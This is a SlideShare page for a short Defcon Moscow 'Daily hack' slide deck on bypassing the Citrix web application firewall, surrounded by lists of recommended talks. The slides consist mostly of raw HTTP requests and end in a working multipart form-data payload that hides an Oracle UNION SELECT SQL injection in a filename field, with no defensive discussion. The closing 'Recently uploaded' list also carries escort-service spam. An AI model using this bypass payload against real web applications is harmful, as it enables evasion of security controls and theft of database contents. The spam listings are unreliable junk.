SlideShare a Scribd company logo

Citrix WAF bypass techniques exposed in daily hack report

defconmoscow
defconmoscow

Meeting #2.

Internet
1 of 7
Download to read offline
Daily hack By DCM Jun 30, 2013
/whoami Defcon Moscow  You already know it about us  ???  PROFIT
Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr
Daily hack The end.

Recommended

Change log
Change logChange log
Change logWagner Alves
 
A brief history of Linux Containers
A brief history of Linux Containers A brief history of Linux Containers
A brief history of Linux Containers Kirill Kolyshkin
 
Brief history of Linux containers
Brief history of Linux containersBrief history of Linux containers
Brief history of Linux containersOpenVZ
 
Test
TestTest
Testdangthikimoanh
 
Installation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdInstallation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdgourav kottawar
 
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanUnicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanCysinfo Cyber Security Community
 
Containers from scratch
Containers from scratchContainers from scratch
Containers from scratchRakuten Group, Inc.
 
using Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderusing Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderYingshiuan Pan
 

Recommended

Change log
Change logChange log
Change logWagner Alves
 
A brief history of Linux Containers
A brief history of Linux Containers A brief history of Linux Containers
A brief history of Linux Containers Kirill Kolyshkin
 
Brief history of Linux containers
Brief history of Linux containersBrief history of Linux containers
Brief history of Linux containersOpenVZ
 
Test
TestTest
Testdangthikimoanh
 
Installation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdInstallation of windows 7 || how to boot pendrive or cd/dvd
Installation of windows 7 || how to boot pendrive or cd/dvdgourav kottawar
 
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanUnicorn: The Ultimate CPU Emulator by Akshay Ajayan
Unicorn: The Ultimate CPU Emulator by Akshay AjayanCysinfo Cyber Security Community
 
Containers from scratch
Containers from scratchContainers from scratch
Containers from scratchRakuten Group, Inc.
 
using Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderusing Virtualbox NAT and shared folder
using Virtualbox NAT and shared folderYingshiuan Pan
 
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkDRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkmeazza_15
 
Building a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellBuilding a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellEC-Council
 
Windows 7 installation ppt
Windows 7 installation pptWindows 7 installation ppt
Windows 7 installation pptNagarajan Kamalakannan
 
How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.José Ignacio Carretero Guarde
 
Windows XP Professional Installation
Windows XP Professional InstallationWindows XP Professional Installation
Windows XP Professional InstallationNagarajan Kamalakannan
 
Require js + backbone, bower and grunt
Require js + backbone, bower and gruntRequire js + backbone, bower and grunt
Require js + backbone, bower and gruntJoe Fleming
 
containers-intro
containers-introcontainers-intro
containers-introJosef Karásek
 
Deposito
DepositoDeposito
Depositoasroli AkanberubahinsyaAllah
 
Exploits
ExploitsExploits
ExploitsTylor Shellenberger
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriDesign Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriManageIQ
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsEuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsVinícius Zavam
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hostingpunkt.de GmbH
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 
Hacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionHacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionLevente Kurusa
 
Redis fundamental
Redis fundamentalRedis fundamental
Redis fundamentalYuhao Zhang
 
CodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCheyin L
 
Linux Tor Browser kurulum
Linux Tor Browser kurulumLinux Tor Browser kurulum
Linux Tor Browser kurulumreso95
 
Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Yuki Mizuno
 
Hacking Citrix Cloud Server
Hacking Citrix Cloud ServerHacking Citrix Cloud Server
Hacking Citrix Cloud ServerMr Cracker
 
Got citrix hack it
Got citrix hack itGot citrix hack it
Got citrix hack itSujith Rasnayake
 
In house penetration testing pci dss
In house penetration testing pci dssIn house penetration testing pci dss
In house penetration testing pci dssRichard Thompson
 
[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on AndroidDEVCORE
 

More Related Content

What's hot

DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkDRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkmeazza_15
 
Building a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellBuilding a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellEC-Council
 
Require js + backbone, bower and grunt
Require js + backbone, bower and gruntRequire js + backbone, bower and grunt
Require js + backbone, bower and gruntJoe Fleming
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriDesign Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriManageIQ
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsEuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsVinícius Zavam
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 
Hacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionHacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionLevente Kurusa
 
Redis fundamental
Redis fundamentalRedis fundamental
Redis fundamentalYuhao Zhang
 
CodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCheyin L
 
Linux Tor Browser kurulum
Linux Tor Browser kurulumLinux Tor Browser kurulum
Linux Tor Browser kurulumreso95
 
Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Yuki Mizuno
 

What's hot (18)

DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wiresharkDRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
 
Building a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin CardwellBuilding a Cyber Range - Kevin Cardwell
Building a Cyber Range - Kevin Cardwell
 
Windows 7 installation ppt
Windows 7 installation pptWindows 7 installation ppt
Windows 7 installation ppt
 
How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.How to access your FIWARE Lab Instance.
How to access your FIWARE Lab Instance.
 
Windows XP Professional Installation
Windows XP Professional InstallationWindows XP Professional Installation
Windows XP Professional Installation
 
Require js + backbone, bower and grunt
Require js + backbone, bower and gruntRequire js + backbone, bower and grunt
Require js + backbone, bower and grunt
 
containers-intro
containers-introcontainers-intro
containers-intro
 
Deposito
DepositoDeposito
Deposito
 
Exploits
ExploitsExploits
Exploits
 
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich OliveriDesign Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
 
EuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD SystemsEuroBSDCon 2021 - (auto)Installing BSD Systems
EuroBSDCon 2021 - (auto)Installing BSD Systems
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hosting
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means
 
Hacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An IntroductionHacking the Linux Kernel - An Introduction
Hacking the Linux Kernel - An Introduction
 
Redis fundamental
Redis fundamentalRedis fundamental
Redis fundamental
 
CodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storageCodePackager - Pack and Unpack repositories to mobile storage
CodePackager - Pack and Unpack repositories to mobile storage
 
Linux Tor Browser kurulum
Linux Tor Browser kurulumLinux Tor Browser kurulum
Linux Tor Browser kurulum
 
Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話Xavier NXのカーネルとVMの話
Xavier NXのカーネルとVMの話
 

Viewers also liked

Hacking Citrix Cloud Server
Hacking Citrix Cloud ServerHacking Citrix Cloud Server
Hacking Citrix Cloud ServerMr Cracker
 
In house penetration testing pci dss
In house penetration testing pci dssIn house penetration testing pci dss
In house penetration testing pci dssRichard Thompson
 
[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on AndroidDEVCORE
 
Android pen test basics
Android pen test basicsAndroid pen test basics
Android pen test basicsOWASPKerala
 
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...Cheng-Yi Yu
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security WorkshopOWASP
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....Denis Gundarev
 
Penetration Testing for Android Smartphones
Penetration Testing for Android SmartphonesPenetration Testing for Android Smartphones
Penetration Testing for Android SmartphonesIOSR Journals
 

Viewers also liked (12)

Hacking Citrix Cloud Server
Hacking Citrix Cloud ServerHacking Citrix Cloud Server
Hacking Citrix Cloud Server
 
Got citrix hack it
Got citrix hack itGot citrix hack it
Got citrix hack it
 
In house penetration testing pci dss
In house penetration testing pci dssIn house penetration testing pci dss
In house penetration testing pci dss
 
[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android[2014/10/06] HITCON Freetalk - App Security on Android
[2014/10/06] HITCON Freetalk - App Security on Android
 
Android pen test basics
Android pen test basicsAndroid pen test basics
Android pen test basics
 
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop[Wroclaw #1] Android Security Workshop
[Wroclaw #1] Android Security Workshop
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration Testing
 
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
 
Penetration Testing for Android Smartphones
Penetration Testing for Android SmartphonesPenetration Testing for Android Smartphones
Penetration Testing for Android Smartphones
 

Similar to Citrix WAF bypass techniques exposed in daily hack report

Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'Rawnet
 
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Codemotion
 
How our computers connect to facebook
How our computers connect to facebookHow our computers connect to facebook
How our computers connect to facebookYiKuo3
 
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveOWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveCheckmarx
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
Rootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project VirtualisationRootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project VirtualisationThe Linux Foundation
 
Http
HttpHttp
HttpNEATS
 
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)Ericom Software
 
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Grand Parade Poland
 
WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)Igalia
 
Web browsertico
Web browserticoWeb browsertico
Web browserticotico3195
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsAnton Chuvakin
 
Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09deathflu
 
MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)Kevin Lo
 
Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011shoesing
 
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...APNIC
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 

Similar to Citrix WAF bypass techniques exposed in daily hack report (20)

Web tech 101
Web tech 101Web tech 101
Web tech 101
 
Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'Rawnet Lightning talk 'How the Internet Works'
Rawnet Lightning talk 'How the Internet Works'
 
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
Barbarians at the Gate(way) - Dave Lewis - Codemotion Amsterdam 2018
 
How our computers connect to facebook
How our computers connect to facebookHow our computers connect to facebook
How our computers connect to facebook
 
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveOWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Rootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project VirtualisationRootlinux17: An introduction to Xen Project Virtualisation
Rootlinux17: An introduction to Xen Project Virtualisation
 
Http
HttpHttp
Http
 
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
WebSockets Everywhere: the Future Transport Protocol for Everything (Almost)
 
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
 
WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)WebKit Security Updates (GUADEC 2016)
WebKit Security Updates (GUADEC 2016)
 
Cgi
CgiCgi
Cgi
 
Web browsertico
Web browserticoWeb browsertico
Web browsertico
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, Incidents
 
Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09Mobile Activesync Russian Roulette - Kiwicon 09
Mobile Activesync Russian Roulette - Kiwicon 09
 
MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)MOD server & FreeBSD (FreeBSD Day Taiwan)
MOD server & FreeBSD (FreeBSD Day Taiwan)
 
Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011Advanced Netscaler Customizations-BriForum 2011
Advanced Netscaler Customizations-BriForum 2011
 
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 

More from defconmoscow

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRLdefconmoscow
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]defconmoscow
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2defconmoscow
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hackingdefconmoscow
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenmentdefconmoscow
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF finaldefconmoscow
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jaildefconmoscow
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websitesdefconmoscow
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protectiondefconmoscow
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6defconmoscow
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communicationsdefconmoscow
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensicsdefconmoscow
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]defconmoscow
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecryptdefconmoscow
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]defconmoscow
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardwaredefconmoscow
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditionsdefconmoscow
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddlerdefconmoscow
 
4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitation4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitationdefconmoscow
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypotdefconmoscow
 

More from defconmoscow (20)

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRL
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenment
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF final
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communications
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensics
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddler
 
4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitation4.1. Path traversal post_exploitation
4.1. Path traversal post_exploitation
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypot
 

Recently uploaded

Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.soniya singh
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
